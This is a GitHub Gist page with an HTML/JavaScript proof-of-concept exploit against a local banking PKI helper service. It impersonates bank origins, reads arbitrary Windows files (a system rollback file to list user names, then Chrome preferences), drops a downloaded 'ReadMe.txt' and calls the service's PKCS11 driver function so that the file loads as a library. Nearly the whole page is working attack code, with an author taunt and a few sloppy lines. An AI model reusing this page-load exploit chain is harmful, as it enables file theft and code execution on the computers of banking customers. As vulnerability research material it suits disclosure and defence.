Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
RRRRR.
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>Document</title>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
<script src="FileSaver.min.js"></script>
</head>
<body>
<script type="text/javascript">
var sessionId = '';
/*
Hahahaha by Keniver
*/
var xhr = new XMLHttpRequest();
xhr.open("GET", "/chb/ReadMe.txt", true);
xhr.responseType = 'arraybuffer';
xhr.addEventListener('load',function(){
if (xhr.status === 200){
var blob = new Blob([xhr.response], {type: "text/plain;charset=utf-8"});
saveAs(blob, "ReadMe.txt");
}
})
xhr.send();
function triggerLoadLibrary(path) {
let nextJson = {
"functionname": "GPKI_SetPKCS11Driver", "bPath": path, "ENT": "A571582F8C88497AB348892F82ECC092", "iflags": 0, "ComName": "nBOTGPKICryptATLADPT",
"libdir": "OOA", "minserverversion": "1.0.16.0418", "minlibversion": "0.0.0.0", "sessionid": sessionId, "url": "https://newebank.bot.com.tw/"
};
console.log(nextJson);
$.post('https://localhost:56348/', {
Parameter: btoa(JSON.stringify(nextJson))
}, function (result) {
console.log(result);
});
// setTimeout(triggerLoadLibrary, 1000, path);sss
}
$(document).ready(function () {
var firstData = {"functionname":"Echo","ComName":"nBOTGPKICryptATLADPT", "ENT" : "A571582F8C88497AB348892F82ECC092","LibDir":"ENT","minserverversion":"1.0.19.1001","minlibversion":"0.0.0.0","sessionid":"","url":"https://owa.chb.com.tw"};
$.post("https://localhost:56319/",
{ Parameter: btoa(JSON.stringify(firstData)) },
function (result) {
let data = JSON.parse(result);
sessionId = atob(data['SessionID']);
console.log(sessionId);
let nextJson = {
"FunctionName": "GPKI_ReadFile", "flags": 0x1000,
"strFilepath": "C:\\Windows\\Panther\\Rollback\\MachineIndependent\\Transformers\\TransformersRollback.ini",
"btopmostdevice": "", "iflags": 0, "comname": "CHBCGGPKICryptATLSVIAdapter", "libdir": "ENT",
"minserverversion": "1.0.16.0418", "minlibversion": "0.0.0.0", "sessionid": sessionId, "url": "https://owa.chb.com.tw"
};
$.post('https://localhost:56319/', {
Parameter: btoa(JSON.stringify(nextJson))
},
function (result) {
let data = JSON.parse(result);
let content = atob(atob(data['result']));
var users = [];
const regex = /C:\\Users\\([^\\]*)\r?\n/gm;
while ((m = regex.exec(content)) !== null) {
if (m.index === regex.lastIndex) {
regex.lastIndex++;
}
if (m.length > 1)
users.push(m[1]);
}
console.log(users);
//
for (var i in users) {
setTimeout(function (user) {
// "C:\\Users\\t4si\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Preferences"
let path = "C:/Users/" + user + "/AppData/Local/Google/Chrome/User Data/Default/Preferences";
let nextJson = {
"functionname": "GPKI_ReadFile", "flags": 0x1000,
"strFilepath": "C:/Users/t4si/AppData/Local/Google/Chrome/User Data/Default/Preferences",
"btopmostdevice": "", "iflags": 0, "comname": "CHBCGGPKICryptATLSVIAdapter", "libdir": "ENT",
"minserverversion": "1.0.16.0418", "minlibversion": "0.0.0.0", "sessionid": sessionId, "url": "https://owa.chb.com.tw"
};
$.post('https://localhost:56319/', {
Parameter: btoa(JSON.stringify(nextJson))
}, function (result) {
var _user = user;
let data = JSON.parse(result);
let config = JSON.parse(atob(atob(data['result'])));
if (config['savefile'] !== undefined && config['savefile']['default_directory'] != undefined) {
triggerLoadLibrary( + "\\ReadMe.txt");
}
triggerLoadLibrary('C:/Users/' + _user + '/Downloads/ReadMe.txt');
});
//x['savefile']
}, 10, users[i].replace('\r', '').replace('\n', '').toString());
}
});
});
});
</script>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment